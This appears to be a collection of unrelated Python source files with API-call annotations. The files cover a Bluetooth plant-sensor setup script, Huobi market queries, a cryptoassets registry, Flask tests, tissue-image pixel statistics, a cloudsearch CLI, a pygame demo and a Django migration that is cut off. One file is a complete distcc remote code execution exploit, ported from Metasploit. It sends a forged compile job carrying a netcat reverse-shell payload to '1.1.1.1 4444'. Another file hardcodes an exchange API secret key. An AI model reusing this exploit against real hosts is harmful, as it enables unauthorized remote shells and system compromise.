# http://www.apache.org/licenses/LICENSE-2.0
#
##############################################
"""Setup for plantgateway."""
from setuptools import setup
from plantgw import __version__
INSTALL_REQUIRES = ['bluepy==1.1.4', "paho-mqtt", 'pyyaml', "miflora==0.4"]
setup(
name='plantgateway',
version=__version__,
description='Bluetooth to mqtt gateway for Xiaomi Mi plant sensors',
author='<NAME>',
author_email='<EMAIL>',
url='https://www.python.org/sigs/distutils-sig/',
packages=['plantgw'],
install_requires=INSTALL_REQUIRES,
scripts=['plantgateway'],
)
| [
"setuptools.setup"
] | [((428, 737), 'setuptools.setup', 'setup', ([], {'name': '"""plantgateway"""', 'version': '__version__', 'description': '"""Bluetooth to mqtt gateway for Xiaomi Mi plant sensors"""', 'author': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'url': '"""https://www.python.org/sigs/distutils-sig/"""', 'packages': "['plantgw']", 'install_requires': 'INSTALL_REQUIRES', 'scripts': "['plantgateway']"}), "(name='plantgateway', version=__version__, description=\n 'Bluetooth to mqtt gateway for Xiaomi Mi plant sensors', author=\n '<NAME>', author_email='<EMAIL>', url=\n 'https://www.python.org/sigs/distutils-sig/', packages=['plantgw'],\n install_requires=INSTALL_REQUIRES, scripts=['plantgateway'])\n", (433, 737), False, 'from setuptools import setup\n')] |
from huobi import HuobiRestClient
client = HuobiRestClient(access_key='<KEY>', secret_key='ff053cec-06dec3aa-3a15eecf-39e65')
trades = client.market_history_trade(symbol='ethusdt').data
trades
print(trades)
#help(HuobiRestClient)
kline = client.market_history_kline(symbol='btcusdt').data
kline = client.market_history_kline(symbol='btcusdt').data
kline = client.market_history_kline(symbol='btcusdt').data
print(kline)
#help(HuobiRestClient)
| [
"huobi.HuobiRestClient"
] | [((43, 130), 'huobi.HuobiRestClient', 'HuobiRestClient', ([], {'access_key': '"""<KEY>"""', 'secret_key': '"""ff053cec-06dec3aa-3a15eecf-39e65"""'}), "(access_key='<KEY>', secret_key=\n 'ff053cec-06dec3aa-3a15eecf-39e65')\n", (58, 130), False, 'from huobi import HuobiRestClient\n')] |
#!/usr/bin/python3
# Ported from Metasploit module - https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
import socket
from sys import argv
import random
import string
if len(argv) != 3:
print('Usage: ./distcc_exploit ip_addr port')
exit(1)
def exploit(ip, port):
# replace payload
payload = "nc 1.1.1.1 4444 -e /bin/bash"
try:
print('[*] Attempting exploit...')
distcc_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
distcc_socket.connect((ip, int(port)))
distcmd = generate_cmd("sh", "-c", payload)
# encode() to bytes
distcc_socket.send(distcmd.encode())
dtag = random_string_digits(10)
msg = ('DOTI0000000A' + dtag + '\n')
distcc_socket.send(msg.encode())
print("Check your reverse handler...")
response = distcc_socket.recv(1024).decode('utf-8')
print('[+] Response:\n', response)
except socket.error:
print('[!] Failed to exploit %s' % ip)
# generate fake request
def generate_cmd(*args):
cmd = list(args) + ['#', '-c', 'main.c', '-o', 'main.o']
# make it look like a compilation request
request = 'DIST00000001' + 'ARGC' + str(len(cmd)).zfill(8)
for c in cmd:
# returns len(c) and pad it with zeroes such that there are 8 digits after ARGV
request += 'ARGV' + "{0:0{1}x}".format(len(c), 8) + c
return request
# generate a random string of letters and digits
def random_string_digits(string_length):
# creates string with a set of all letters and digits
letters_digits = string.ascii_letters + string.digits
# creates a random string of string_length
random_string = ''
for i in range(string_length):
random_string = random_string + random.choice(letters_digits)
return random_string
exploit(argv[1], argv[2])
| [
"random.choice",
"socket.socket"
] | [((433, 482), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (446, 482), False, 'import socket\n'), ((1774, 1803), 'random.choice', 'random.choice', (['letters_digits'], {}), '(letters_digits)\n', (1787, 1803), False, 'import random\n')] |
"""All running cryptoassets are maintained in a coin registry.
Each cryptoasset provides its own Wallet SQLAlchemy model and backend instance which is used to communicate with the network of the cryptoasset.
"""
from zope.dottedname.resolve import resolve
class CoinModelDescription:
"""Describe one cryptocurrency data structures: what SQLAlchemy models and database tables it uses.
    The instance of this class is used by :py:class:`cryptoassets.core.models.CoinDescriptionModel` to build the model relationships and foreign keys between the tables of one cryptoasset.
"""
def __init__(self, coin_name, wallet_model_name, address_model_name, account_model_name, transaction_model_name, network_transaction_model_name, address_validator):
"""Create the description with fully dotted paths to Python classes.
:param coin_name: Name of this coin, lowercase acronym
"""
assert coin_name == coin_name.lower()
self.coin_name = coin_name
self.wallet_model_name = wallet_model_name
self.address_model_name = address_model_name
self.account_model_name = account_model_name
self.transaction_model_name = transaction_model_name
self.network_transaction_model_name = network_transaction_model_name
self.address_validator = address_validator
# Direct model class reference. Available after Python modules are loaded and Cryptoassets App session initialized
self._Wallet = None
self._Address = None
self._Account = None
self._NetworkTransaction = None
self._Transaction = None
@property
def Wallet(self):
"""Get wallet model class."""
return self._lazy_initialize_class_ref("_Wallet", self.wallet_model_name)
@property
def Address(self):
"""Get address model class."""
return self._lazy_initialize_class_ref("_Address", self.address_model_name)
@property
def Account(self):
"""Get account model class."""
return self._lazy_initialize_class_ref("_Account", self.account_model_name)
@property
def NetworkTransaction(self):
"""Get network transaction model class."""
return self._lazy_initialize_class_ref("_NetworkTransaction", self.network_transaction_model_name)
@property
def Transaction(self):
"""Get transaction model class."""
return self._lazy_initialize_class_ref("_Transaction", self.transaction_model_name)
@property
def wallet_table_name(self):
return "{}_wallet".format(self.coin_name)
@property
def account_table_name(self):
return "{}_account".format(self.coin_name)
@property
def address_table_name(self):
return "{}_address".format(self.coin_name)
@property
def transaction_table_name(self):
return "{}_transaction".format(self.coin_name)
@property
def network_transaction_table_name(self):
return "{}_network_transaction".format(self.coin_name)
def _lazy_initialize_class_ref(self, name, dotted_name):
val = getattr(self, name, None)
if val:
return val
else:
val = resolve(dotted_name)
setattr(self, name, val)
return val
class Coin:
"""Describe one cryptocurrency setup.
Binds cryptocurrency to its backend and database models.
We also carry a flag if we are running in testnet or not. This affects address validation.
"""
def __init__(self, coin_description, backend=None, max_confirmation_count=15, testnet=False):
"""Create a binding between asset models and backend.
:param coin_description: :py:class:`cryptoassets.core.coin.registry.CoinModelDescription`
:param testnet: Are we running a testnet node or real node.
:param backend: :py:class:`cryptoassets.core.backend.base.CoinBackend`
"""
assert isinstance(coin_description, CoinModelDescription)
self.coin_description = coin_description
#: Subclass of :py:class:`cryptoassets.core.backend.base.CoinBackend`.
self.backend = None
#: Lowercase acronym name of this asset
self.name = None
#: This is how many confirmations ``tools.confirmationupdate`` tracks for each network transactions, both incoming and outgoing, until we consider it "closed" and stop polling backend for updates.
self.max_confirmation_count = max_confirmation_count
self.testnet = testnet
@property
def address_model(self):
"""Property to get SQLAlchemy model for address of this cryptoasset.
Subclass of :py:class:`cryptoassets.core.models.GenericAddress`.
"""
return self.coin_description.Address
@property
def transaction_model(self):
"""Property to get SQLAlchemy model for transaction of this cryptoasset.
Subclass of :py:class:`cryptoassets.core.models.GenericTransaction`.
"""
return self.coin_description.Transaction
@property
def account_model(self):
"""Property to get SQLAlchemy model for account of this cryptoasset.
Subclass of :py:class:`cryptoassets.core.models.GenericAccount`.
"""
return self.coin_description.Account
@property
def wallet_model(self):
"""Property to get SQLAlchemy model for account of this cryptoasset.
Subclass of :py:class:`cryptoassets.core.models.GenericWallet`.
"""
return self.coin_description.Wallet
@property
def network_transaction_model(self):
"""Property to get SQLAlchemy model for account of this cryptoasset.
Subclass of :py:class:`cryptoassets.core.models.GenericWallet`.
"""
return self.coin_description.NetworkTransaction
def validate_address(self, address):
"""Check the address validy against current network.
:return: True if given address is valid.
"""
return self.coin_description.address_validator.validate_address(address, self.testnet)
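# Sketch of how the classes above are typically wired together; the dotted model paths and the
# validator/backend objects below are placeholders, not guaranteed to match any shipped asset:
#
#   description = CoinModelDescription(
#       coin_name="btc",
#       wallet_model_name="cryptoassets.core.coin.bitcoin.models.BitcoinWallet",
#       address_model_name="cryptoassets.core.coin.bitcoin.models.BitcoinAddress",
#       account_model_name="cryptoassets.core.coin.bitcoin.models.BitcoinAccount",
#       transaction_model_name="cryptoassets.core.coin.bitcoin.models.BitcoinTransaction",
#       network_transaction_model_name="cryptoassets.core.coin.bitcoin.models.BitcoinNetworkTransaction",
#       address_validator=my_validator)
#   coin = Coin(description, backend=my_backend, testnet=True)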
class CoinRegistry:
"""Holds data of set up cryptocurrencies.
    Usually you access this through the :py:attr:`cryptoassets.core.app.CryptoassetsApp.coins` attribute.
Example::
cryptoassets_app = CryptoassetsApp()
# ... setup ...
bitcoin = cryptoassets_app.coins.get("btc)
print("We are running bitcoin with backend {}".format(bitcoin.backend))
"""
def __init__(self):
self.coins = {}
def register(self, name, coin):
self.coins[name] = coin
# Setup backref
coin.name = name
def all(self):
"""Get all registered coin models.
:return: List of tuples(coin name, Coin)
"""
return self.coins.items()
def get(self, name):
"""Return coin setup data by its acronym name.
:param name: All lowercase, e.g. ``btc``.
"""
return self.coins.get(name)
| [
"zope.dottedname.resolve.resolve"
] | [((3189, 3209), 'zope.dottedname.resolve.resolve', 'resolve', (['dotted_name'], {}), '(dotted_name)\n', (3196, 3209), False, 'from zope.dottedname.resolve import resolve\n')] |
import json
import unittest
from unittest.mock import patch
from app import app
from exceptions import InvalidDateFormat
from tests.mocks import FakeResponse
class TestFlaskApp(unittest.TestCase):
def setUp(self):
self._app = app
self._app.config.update({
"TESTING": True
})
def test_home_page_should_return_expected_message(self):
with self._app.test_client() as test_client:
expectedResponse = FakeResponse(
data=b"Welcome to Calendar App. Please visit url: 'hostname:port/date' to try it.", status_code=200)
# Hitting home page
actualResponse = test_client.get('/')
self.assertEqual(expectedResponse.status_code,
actualResponse.status_code)
self.assertEqual(expectedResponse.data, actualResponse.data)
@patch("app.getDateMatrix")
def test_date_page_should_return_expected_message_for_valid_date(self, stubGetDateMatrix):
dummyDate = "2022-02-27"
expectedDateMatrix = b"[[30, 31, 1, 2, 3, 4, 5], [6, 7, 8, 9, 10, 11, 12], [13, 14, 15, 16, 17, 18, 19], [20, 21, 22, 23, 24, 25, 26], [27, 28, 1, 2, 3, 4, 5], [6, 7, 8, 9, 10, 11, 12]]"
stubGetDateMatrix.return_value = json.loads(
expectedDateMatrix.decode())
expectedResponse = FakeResponse(
data=expectedDateMatrix, status_code=200)
with self._app.test_client() as test_client:
# Hitting home page
actualResponse = test_client.get(f'/{dummyDate}')
self.assertEqual(expectedResponse.status_code,
actualResponse.status_code)
self.assertEqual(expectedResponse.data, actualResponse.data)
@patch("app.getDateMatrix")
def test_date_page_should_return_400_for_invalid_date(self, stubGetDateMatrix):
dummyDate = "2022-02-27"
stubGetDateMatrix.side_effect = InvalidDateFormat(
"unittest-invalid-date")
expectedResponse = FakeResponse(
data="unittest-invalid-date", status_code=400)
with self._app.test_client() as test_client:
# Hitting home page
actualResponse = test_client.get(f'/{dummyDate}')
self.assertEqual(expectedResponse.status_code,
actualResponse.status_code)
self.assertEqual(expectedResponse.data,
actualResponse.data.decode())
@patch("app.getDateMatrix")
def test_date_page_should_return_500_for_unexpected_server_side_error(self, stubGetDateMatrix):
dummyDate = "2022-02-27"
stubGetDateMatrix.side_effect = Exception(
"unittest-server-side-exception")
expectedResponse = FakeResponse(
data="Server side issue", status_code=500)
with self._app.test_client() as test_client:
# Hitting home page
actualResponse = test_client.get(f'/{dummyDate}')
self.assertEqual(expectedResponse.status_code,
actualResponse.status_code)
self.assertEqual(expectedResponse.data,
actualResponse.data.decode())
if __name__ == "__main__":
unittest.main()
| [
"unittest.main",
"unittest.mock.patch",
"tests.mocks.FakeResponse",
"exceptions.InvalidDateFormat"
] | [((875, 901), 'unittest.mock.patch', 'patch', (['"""app.getDateMatrix"""'], {}), "('app.getDateMatrix')\n", (880, 901), False, 'from unittest.mock import patch\n'), ((1758, 1784), 'unittest.mock.patch', 'patch', (['"""app.getDateMatrix"""'], {}), "('app.getDateMatrix')\n", (1763, 1784), False, 'from unittest.mock import patch\n'), ((2480, 2506), 'unittest.mock.patch', 'patch', (['"""app.getDateMatrix"""'], {}), "('app.getDateMatrix')\n", (2485, 2506), False, 'from unittest.mock import patch\n'), ((3242, 3257), 'unittest.main', 'unittest.main', ([], {}), '()\n', (3255, 3257), False, 'import unittest\n'), ((1346, 1400), 'tests.mocks.FakeResponse', 'FakeResponse', ([], {'data': 'expectedDateMatrix', 'status_code': '(200)'}), '(data=expectedDateMatrix, status_code=200)\n', (1358, 1400), False, 'from tests.mocks import FakeResponse\n'), ((1942, 1984), 'exceptions.InvalidDateFormat', 'InvalidDateFormat', (['"""unittest-invalid-date"""'], {}), "('unittest-invalid-date')\n", (1959, 1984), False, 'from exceptions import InvalidDateFormat\n'), ((2025, 2084), 'tests.mocks.FakeResponse', 'FakeResponse', ([], {'data': '"""unittest-invalid-date"""', 'status_code': '(400)'}), "(data='unittest-invalid-date', status_code=400)\n", (2037, 2084), False, 'from tests.mocks import FakeResponse\n'), ((2764, 2819), 'tests.mocks.FakeResponse', 'FakeResponse', ([], {'data': '"""Server side issue"""', 'status_code': '(500)'}), "(data='Server side issue', status_code=500)\n", (2776, 2819), False, 'from tests.mocks import FakeResponse\n'), ((465, 588), 'tests.mocks.FakeResponse', 'FakeResponse', ([], {'data': 'b"Welcome to Calendar App. Please visit url: \'hostname:port/date\' to try it."', 'status_code': '(200)'}), '(data=\n b"Welcome to Calendar App. Please visit url: \'hostname:port/date\' to try it."\n , status_code=200)\n', (477, 588), False, 'from tests.mocks import FakeResponse\n')] |
# Import Required Modules
import os
import argparse
import numpy as np
import pandas as pd
import reducers as r
from tqdm import tqdm
from skimage.io import imread
##############################################################################
DEFAULT_INPUT_FOLDER = '.../'
DEFAULT_OUTPUT_FOLDER = '.../'
DEFAULT_SURVIVAL_RATE_FILE = 'GBM_Logs.csv'
DEFAULT_IMAGE_SHAPE = (1024, 1024, 3)
SURVIVAL_RATE_FILE_HEADER_NAMES = [
"number",
r.PATIENT_ID,
"survival_rate_days",
"survival_rate_months",
"age_years",
"primary_diagnosis",
]
ENCODINGS = [
{
r.PIXEL_TYPE: "Leading_Edge_LE_(Teal_or_Blue_Areas)",
r.PIXEL_VALUE: (33, 143, 166),
},
{
r.PIXEL_TYPE: "Infiltrating_Tumor_IT_(Purple_Areas)",
r.PIXEL_VALUE: (210, 5, 208)
},
{
r.PIXEL_TYPE: "Cellular_Tumor_CT_(Green_Areas)",
r.PIXEL_VALUE: (5, 208, 4)
},
{
r.PIXEL_TYPE: "Necrosis_CTne_(Black_Areas)",
r.PIXEL_VALUE: (5, 5, 5)
},
{
r.PIXEL_TYPE: "Perinecrotic_Zone_CTpnz_(Light_Blue_Areas)",
r.PIXEL_VALUE: (37, 209, 247)
},
{
r.PIXEL_TYPE: "Pseudopalisading_Cells_Around_Necrosis_CTpan_(Sea_Green_Areas)",
r.PIXEL_VALUE: (6, 208, 170)
},
{
r.PIXEL_TYPE: "Microvascular_Proliferation_CTmvp_(Red_Areas)",
r.PIXEL_VALUE: (255, 102, 0)
},
{
r.PIXEL_TYPE: "Background",
r.PIXEL_VALUE: (255, 255, 255)
}
]
def run(
input_folder,
output_folder,
dry_run,
verbose,
):
if not os.path.exists(input_folder):
raise Exception('Input directory must exist: "{input_folder}"'.format(input_folder=input_folder))
if not os.path.exists(output_folder):
if verbose:
print('Creating output directory "{output_folder}"'.format(output_folder=output_folder))
if not dry_run:
os.makedirs(output_folder, exist_ok=True)
survival_rate_file = os.path.join(input_folder, DEFAULT_SURVIVAL_RATE_FILE)
if not os.path.exists(survival_rate_file):
raise Exception('Survival rate file must exist: "{survival_rate_file}"'.format(survival_rate_file=survival_rate_file))
survival_rate_per_patient = pd.read_csv(survival_rate_file, header=0, names=SURVIVAL_RATE_FILE_HEADER_NAMES)[[r.PATIENT_ID, 'survival_rate_days', 'survival_rate_months']]
average_pixel_type_per_patient = pd.DataFrame()
average_pixel_type_per_patient_reducer = r.AveragePixelTypePerPatientReducer(ENCODINGS)
for patient_id in tqdm(os.listdir(input_folder), total = len(os.listdir(input_folder))):
patient_folder = os.path.join(input_folder, patient_id)
if os.path.isdir(patient_folder):
patient_tissue_blocks = np.zeros((len(os.listdir(patient_folder)),) + DEFAULT_IMAGE_SHAPE)
for i, patient_tissue_block in enumerate(os.listdir(patient_folder)):
patient_tissue_block_file = os.path.join(patient_folder, patient_tissue_block)
patient_tissue_blocks[i, :, :, :] = imread(patient_tissue_block_file)
tissue_blocks_by_patient_id = pd.DataFrame([
{
r.PATIENT_ID: patient_id,
r.SEGMENTATION: patient_tissue_blocks
}
])
_average_pixel_type_per_patient = average_pixel_type_per_patient_reducer \
.calculate_average_pixel_type_per_patient(tissue_blocks_by_patient_id)
average_pixel_type_per_patient = average_pixel_type_per_patient.append(_average_pixel_type_per_patient)
average_pixel_type_per_patient = average_pixel_type_per_patient.drop('Background', axis=1)
average_pixel_type_per_patient \
.merge(survival_rate_per_patient, how="left", on=r.PATIENT_ID) \
.to_csv(output_folder + 'average_pixel_value_per_patient.csv', index=False)
if __name__ == '__main__':
arg_parser = argparse.ArgumentParser('Computers Average Pixel Values Per Patient')
arg_parser.add_argument("--input-folder", default=DEFAULT_INPUT_FOLDER)
arg_parser.add_argument("--output-folder", default=DEFAULT_OUTPUT_FOLDER)
arg_parser.add_argument("--dry-run", action='store_true')
arg_parser.add_argument("--verbose", action='store_true')
args = arg_parser.parse_args()
run(input_folder=args.input_folder,
output_folder=args.output_folder,
dry_run=args.dry_run,
verbose=args.verbose)
| [
"os.path.exists",
"os.listdir",
"argparse.ArgumentParser",
"pandas.read_csv",
"os.makedirs",
"os.path.join",
"skimage.io.imread",
"os.path.isdir",
"reducers.AveragePixelTypePerPatientReducer",
"pandas.DataFrame"
] | [((1974, 2028), 'os.path.join', 'os.path.join', (['input_folder', 'DEFAULT_SURVIVAL_RATE_FILE'], {}), '(input_folder, DEFAULT_SURVIVAL_RATE_FILE)\n', (1986, 2028), False, 'import os\n'), ((2416, 2430), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (2428, 2430), True, 'import pandas as pd\n'), ((2476, 2522), 'reducers.AveragePixelTypePerPatientReducer', 'r.AveragePixelTypePerPatientReducer', (['ENCODINGS'], {}), '(ENCODINGS)\n', (2511, 2522), True, 'import reducers as r\n'), ((3925, 3994), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (['"""Computers Average Pixel Values Per Patient"""'], {}), "('Computers Average Pixel Values Per Patient')\n", (3948, 3994), False, 'import argparse\n'), ((1572, 1600), 'os.path.exists', 'os.path.exists', (['input_folder'], {}), '(input_folder)\n', (1586, 1600), False, 'import os\n'), ((1719, 1748), 'os.path.exists', 'os.path.exists', (['output_folder'], {}), '(output_folder)\n', (1733, 1748), False, 'import os\n'), ((2040, 2074), 'os.path.exists', 'os.path.exists', (['survival_rate_file'], {}), '(survival_rate_file)\n', (2054, 2074), False, 'import os\n'), ((2236, 2321), 'pandas.read_csv', 'pd.read_csv', (['survival_rate_file'], {'header': '(0)', 'names': 'SURVIVAL_RATE_FILE_HEADER_NAMES'}), '(survival_rate_file, header=0, names=SURVIVAL_RATE_FILE_HEADER_NAMES\n )\n', (2247, 2321), True, 'import pandas as pd\n'), ((2550, 2574), 'os.listdir', 'os.listdir', (['input_folder'], {}), '(input_folder)\n', (2560, 2574), False, 'import os\n'), ((2641, 2679), 'os.path.join', 'os.path.join', (['input_folder', 'patient_id'], {}), '(input_folder, patient_id)\n', (2653, 2679), False, 'import os\n'), ((2691, 2720), 'os.path.isdir', 'os.path.isdir', (['patient_folder'], {}), '(patient_folder)\n', (2704, 2720), False, 'import os\n'), ((1907, 1948), 'os.makedirs', 'os.makedirs', (['output_folder'], {'exist_ok': '(True)'}), '(output_folder, exist_ok=True)\n', (1918, 1948), False, 'import os\n'), ((3130, 3215), 'pandas.DataFrame', 'pd.DataFrame', (['[{r.PATIENT_ID: patient_id, r.SEGMENTATION: patient_tissue_blocks}]'], {}), '([{r.PATIENT_ID: patient_id, r.SEGMENTATION:\n patient_tissue_blocks}])\n', (3142, 3215), True, 'import pandas as pd\n'), ((2588, 2612), 'os.listdir', 'os.listdir', (['input_folder'], {}), '(input_folder)\n', (2598, 2612), False, 'import os\n'), ((2878, 2904), 'os.listdir', 'os.listdir', (['patient_folder'], {}), '(patient_folder)\n', (2888, 2904), False, 'import os\n'), ((2951, 3001), 'os.path.join', 'os.path.join', (['patient_folder', 'patient_tissue_block'], {}), '(patient_folder, patient_tissue_block)\n', (2963, 3001), False, 'import os\n'), ((3054, 3087), 'skimage.io.imread', 'imread', (['patient_tissue_block_file'], {}), '(patient_tissue_block_file)\n', (3060, 3087), False, 'from skimage.io import imread\n'), ((2772, 2798), 'os.listdir', 'os.listdir', (['patient_folder'], {}), '(patient_folder)\n', (2782, 2798), False, 'import os\n')] |
# -*- coding: utf-8 -*-
"""
"""
import os
#import codecs
import logging
import ConfigParser
import cmdln
import requests
from nozama.cloudsearch.client.rest import CloudsearchService
class AdminCmds(cmdln.Cmdln):
"""Usage:
{name}-admin -c / --config <admin.ini> SUBCOMMAND [ARGS...]
{name}-admin help SUBCOMMAND
${command_list}
${help_list}
"""
# this is also used as the section to get settings from.
name = "cloudsearch-admin"
def __init__(self, *args, **kwargs):
cmdln.Cmdln.__init__(self, *args, **kwargs)
self.log = logging.getLogger("%s.AdminCmds" % __name__)
def get_optparser(self):
"""Parser for global options (that are not specific to a subcommand).
"""
optparser = cmdln.CmdlnOptionParser(self)
optparser.add_option(
'-c', '--config', action='store',
dest="config_filename",
default="admin.ini",
help='The global config file %default'
)
return optparser
def postoptparse(self):
"""runs after parsing global options"""
@property
def config(self):
"""Return a config instance when called.
Implement file change and reloading here?
"""
cfg_filename = self.options.config_filename
rc = {}
if os.path.isfile(cfg_filename):
config = ConfigParser.ConfigParser()
self.log.debug("config: recovering from <%s>" % cfg_filename)
config.read(cfg_filename)
rc = dict(config.items(self.name))
else:
self.log.warn(
"confg: file not found <%s> using defaults." % cfg_filename
)
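        # fall back to the default local service URL when nothing is configured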
if 'url' not in rc:
rc['url'] = "http://localhost:63833"
return rc
def do_ping(self, subcmd, opts):
"""${cmd_name}: Check if the Latchpony REST Service is running.
The URL for the service is read from the configuration file.
${cmd_usage}
${cmd_option_list}
"""
cfg = self.config
lp_service_url = cfg['url']
self.log.debug("ping: URL <%s>" % lp_service_url)
lps = CloudsearchService()
try:
result = lps.ping()
except requests.exceptions.ConnectionError:
self.log.error("Unable to connect to cloudsearch service.")
else:
self.log.info("Connected to cloudsearch service OK: %s" % result)
| [
"logging.getLogger",
"ConfigParser.ConfigParser",
"os.path.isfile",
"nozama.cloudsearch.client.rest.CloudsearchService",
"cmdln.Cmdln.__init__",
"cmdln.CmdlnOptionParser"
] | [((525, 568), 'cmdln.Cmdln.__init__', 'cmdln.Cmdln.__init__', (['self', '*args'], {}), '(self, *args, **kwargs)\n', (545, 568), False, 'import cmdln\n'), ((588, 632), 'logging.getLogger', 'logging.getLogger', (["('%s.AdminCmds' % __name__)"], {}), "('%s.AdminCmds' % __name__)\n", (605, 632), False, 'import logging\n'), ((773, 802), 'cmdln.CmdlnOptionParser', 'cmdln.CmdlnOptionParser', (['self'], {}), '(self)\n', (796, 802), False, 'import cmdln\n'), ((1343, 1371), 'os.path.isfile', 'os.path.isfile', (['cfg_filename'], {}), '(cfg_filename)\n', (1357, 1371), False, 'import os\n'), ((2187, 2207), 'nozama.cloudsearch.client.rest.CloudsearchService', 'CloudsearchService', ([], {}), '()\n', (2205, 2207), False, 'from nozama.cloudsearch.client.rest import CloudsearchService\n'), ((1394, 1421), 'ConfigParser.ConfigParser', 'ConfigParser.ConfigParser', ([], {}), '()\n', (1419, 1421), False, 'import ConfigParser\n')] |
import pygame
black = (0, 0, 0)
white = (255, 255, 255)
grey = (192, 192, 192)
dark_grey = (48, 48, 48)
red = (255, 0, 0)
blue = (0, 0, 255)
green = (0, 255, 0)
pygame.init()
screen = pygame.display.set_mode((300, 300))
class Text(pygame.sprite.Sprite):
    def __init__(self, group, text, size, color, width, height):
        # Call the parent class (Sprite) constructor and add this sprite to the group
        pygame.sprite.Sprite.__init__(self, group)
        self.font = pygame.font.SysFont("Arial", size)
        self.textSurf = self.font.render(text, 1, color)
        self.image = pygame.Surface((width, height))
        W = self.textSurf.get_width()
        H = self.textSurf.get_height()
        self.image.blit(self.textSurf, [width/2 - W/2, height/2 - H/2])
        # group.draw() needs a rect to know where to blit this sprite
        self.rect = self.image.get_rect()
# class Text(pygame.sprite.Sprite):
# def __init__(self, text, size, color, font=None, **kwargs):
# super(Text, self).__init__()
# self.color = color
# self.font = pygame.font.Font(font, size)
# self.kwargs = kwargs
# self.set(text)
# def set(self, text):
# self.image = self.font.render(str(text), 1, self.color)
# self.rect = self.image.get_rect(**self.kwargs)
group = pygame.sprite.LayeredUpdates()
Text(group, "Coba", 36, blue, 60, 60)
## Additional code or tester
# fontSmall = pygame.font.Font('freesansbold.ttf', 16)
# tPlayer1 = fontSmall.render('PLAYER1', True, green, blue) #(the text, True, text colour, background color)
# tPlayer1R = tPlayer1.get_rect()
# tPlayer1R.center = (100, 100)
run = True
while run:
for e in pygame.event.get():
if e.type ==pygame.QUIT:
run = False
screen.fill((0,0,0))
# screen.blit(tPlayer1, tPlayer1R)
group.update()
group.draw(screen)
pygame.display.flip() | [
"pygame.sprite.LayeredUpdates",
"pygame.init",
"pygame.event.get",
"pygame.Surface",
"pygame.display.set_mode",
"pygame.display.flip",
"pygame.sprite.Sprite.__init__",
"pygame.font.SysFont"
] | [((162, 175), 'pygame.init', 'pygame.init', ([], {}), '()\n', (173, 175), False, 'import pygame\n'), ((185, 220), 'pygame.display.set_mode', 'pygame.display.set_mode', (['(300, 300)'], {}), '((300, 300))\n', (208, 220), False, 'import pygame\n'), ((1174, 1204), 'pygame.sprite.LayeredUpdates', 'pygame.sprite.LayeredUpdates', ([], {}), '()\n', (1202, 1204), False, 'import pygame\n'), ((1541, 1559), 'pygame.event.get', 'pygame.event.get', ([], {}), '()\n', (1557, 1559), False, 'import pygame\n'), ((1728, 1749), 'pygame.display.flip', 'pygame.display.flip', ([], {}), '()\n', (1747, 1749), False, 'import pygame\n'), ((385, 420), 'pygame.sprite.Sprite.__init__', 'pygame.sprite.Sprite.__init__', (['self'], {}), '(self)\n', (414, 420), False, 'import pygame\n'), ((442, 476), 'pygame.font.SysFont', 'pygame.font.SysFont', (['"""Arial"""', 'size'], {}), "('Arial', size)\n", (461, 476), False, 'import pygame\n'), ((555, 586), 'pygame.Surface', 'pygame.Surface', (['(width, height)'], {}), '((width, height))\n', (569, 586), False, 'import pygame\n')] |
# Generated by Django 3.2.7 on 2021-10-06 05:59
import contact.models.social_links
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='ContactForm',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('create_date', models.DateTimeField(auto_now_add=True, verbose_name='Created At')),
('modified_date', models.DateTimeField(auto_now=True, verbose_name='Modified At')),
('is_deleted', models.BooleanField(default=False, verbose_name='Is Instance marked deleted')),
('is_active', models.BooleanField(default=True, verbose_name='Is Instance marked Active')),
('name', models.CharField(max_length=32, verbose_name='Name')),
('email', models.EmailField(blank=True, max_length=254, null=True, verbose_name='Email')),
('contact_number', models.CharField(blank=True, max_length=32, null=True, verbose_name='Contact number')),
('message', models.TextField(verbose_name='Message')),
],
options={
'verbose_name': 'Contact Form',
'verbose_name_plural': 'Contact Forms',
},
),
migrations.CreateModel(
name='SocialLink',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('create_date', models.DateTimeField(auto_now_add=True, verbose_name='Created At')),
('modified_date', models.DateTimeField(auto_now=True, verbose_name='Modified At')),
('is_deleted', models.BooleanField(default=False, verbose_name='Is Instance marked deleted')),
('is_active', models.BooleanField(default=True, verbose_name='Is Instance marked Active')),
('name', models.CharField(max_length=32, verbose_name='Type of notification')),
('image', models.ImageField(upload_to=contact.models.social_links.upload_to, verbose_name='Image')),
],
options={
'verbose_name': 'Social link',
'verbose_name_plural': 'Social links',
},
),
]
| [
"django.db.models.EmailField",
"django.db.models.TextField",
"django.db.models.BooleanField",
"django.db.models.ImageField",
"django.db.models.BigAutoField",
"django.db.models.DateTimeField",
"django.db.models.CharField"
] | [((342, 438), 'django.db.models.BigAutoField', 'models.BigAutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (361, 438), False, 'from django.db import migrations, models\n'), ((469, 535), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'verbose_name': '"""Created At"""'}), "(auto_now_add=True, verbose_name='Created At')\n", (489, 535), False, 'from django.db import migrations, models\n'), ((572, 635), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now': '(True)', 'verbose_name': '"""Modified At"""'}), "(auto_now=True, verbose_name='Modified At')\n", (592, 635), False, 'from django.db import migrations, models\n'), ((669, 746), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)', 'verbose_name': '"""Is Instance marked deleted"""'}), "(default=False, verbose_name='Is Instance marked deleted')\n", (688, 746), False, 'from django.db import migrations, models\n'), ((779, 854), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)', 'verbose_name': '"""Is Instance marked Active"""'}), "(default=True, verbose_name='Is Instance marked Active')\n", (798, 854), False, 'from django.db import migrations, models\n'), ((882, 934), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(32)', 'verbose_name': '"""Name"""'}), 